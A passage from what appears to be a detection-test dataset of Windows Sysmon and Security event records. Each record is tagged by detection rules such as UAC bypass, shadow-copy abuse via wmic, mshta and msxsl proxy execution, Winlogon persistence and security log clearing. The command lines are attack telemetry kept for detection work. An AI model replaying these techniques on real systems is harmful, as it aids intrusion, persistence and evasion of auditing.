c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat","Company":"Microsoft","CurrentDirectory":"D:\\","Description":"msxsl","FileVersion":"1.1.0.1","Hashes":"SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D2D4-5CE6-0000-001047EA6400","ParentProcessId":2236,"ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Command Line XSLT","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 
17:26:08.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1017,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.716859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"MSXML 3.0 SP11","FileVersion":"8.110.7601.23648","Hashes":"SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","ImageLoaded":"C:\\Windows\\System32\\msxml3.dll","ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Microsoft(R) MSXML 3.0 SP11","RuleName":"Execution - Suspicious Microsoft.XMLDOM module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-05-23 17:26:08.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":1018,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:26:08.947190Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious 
ftp.exe"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /C c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\ftp.exe\" -s:c:\\users\\ieuser\\appdata\\local\\temp\\ftp.txt","ParentImage":"C:\\Windows\\System32\\ftp.exe","ParentProcessGuid":"365ABB72-55F1-5CD8-0000-00108A153300","ParentProcessId":3668,"ProcessGuid":"365ABB72-55F1-5CD8-0000-0010781C3300","ProcessId":2392,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:20:49.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16513,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:20:49.443464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ProcessId":6292,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.257"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400701,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.276333Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Explorer Root Flag Process Tree Break","Proxy Execution Via Explorer.exe"],"event":{"Event":{"EventData":{"CommandLine":"explorer.exe /root,\"c:\\windows\\System32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Administrator.ECORP\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=59AB8548708342C77C51F70EEC5CED0A88DC4701,MD5=6A65873EA949C5CCC72DDEF9E9780AA5,SHA256=16656BBB748BA1C811BB2C68D987DC0F5CAF149E41A84E45F6B6ECAAF7D29AB2,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959","Image":"C:\\Windows\\explorer.exe","IntegrityLevel":"High","LogonGuid":"6661D424-948B-5EEF-0000-002072300F00","LogonId":"0xf3072","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ParentProcessId":6292,"ProcessGuid":"6661D424-F4F6-5EFE-0000-0010E7EFF800","ProcessId":6860,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"ECORP\\Administrator","UtcTime":"2020-07-03 09:05:58.268"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":1,"EventRecordID":400702,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.278154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"6661D424-9438-5EEF-0000-00104DA20000","ProcessId":792,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.319"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400703,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.364162Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"00000000-0000-0000-0000-000000000000","ProcessId":6860,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400707,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.619637Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\calc.exe","ProcessGuid":"6661D424-F4F6-5EFE-0000-0010C00AF900","ProcessId":3224,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\System32\\win32calc.exe","UtcTime":"2020-07-03 
09:05:58.707"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400708,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.737753Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /groups ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c whoami /groups ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE66-5CEB-0000-001058F50B00","ParentProcessId":3256,"ProcessGuid":"365ABB72-FE66-5CEB-0000-0010C7F80B00","ProcessId":1168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 
15:12:38.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6170,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:38.290374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE6F-5CEB-0000-0010F4370C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-FE6F-5CEB-0000-0010D33A0C00","ProcessId":3344,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 
15:12:47.456"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6182,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:47.478285Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious WMI Execution","Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE76-5CEB-0000-0010546E0C00","ParentProcessId":2356,"ProcessGuid":"365ABB72-FE76-5CEB-0000-001077710C00","ProcessId":2840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 
15:12:54.515"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6190,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:54.544664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\update.hta\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\update.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9972-5D04-0000-0010F0490C00","ParentProcessId":3660,"ProcessGuid":"365ABB72-9AA6-5D04-0000-00109C850F00","ProcessId":652,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 
07:13:42.278"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7648,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:13:42.294109Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Rundll32 Without Parameters"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-0A6F-5D1D-0000-0020CA350100","LogonId":"0x135ca","ParentCommandLine":"\"C:\\Windows\\system32\\notepad.exe\" ","ParentImage":"C:\\Windows\\System32\\notepad.exe","ParentProcessGuid":"365ABB72-1256-5D1D-0000-0010FB1A1B00","ParentProcessId":1632,"ProcessGuid":"365ABB72-1282-5D1D-0000-0010DD401B00","ProcessId":2328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-07-03 
20:39:30.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8352,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:39:30.254733Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-21-3461203602-4096304019-2269080069-501","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191029,"Execution_attributes":{"ProcessID":624,"ThreadID":4452},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:22:05.201727Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting 
group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-20","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191030,"Execution_attributes":{"ProcessID":624,"ThreadID":5108},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:23:19.251925Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":203050,"Execution_attributes":{"ProcessID":744,"ThreadID":768},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-08T03:00:11.778188Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x218b896","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198242566,"Execution_attributes":{"ProcessID":744,"ThreadID":3396},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T21:28:11.073626Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-14 22:22:21.503","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","UtcTime":"2019-06-14 22:22:21.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":7531,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.503995Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus 
Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\",explorer.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"Persistence - Winlogon Shell","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell","UtcTime":"2019-06-14 22:22:21.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":7532,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.535245Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E1D-5D04-0000-001003E70A00","ProcessId":1008,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 
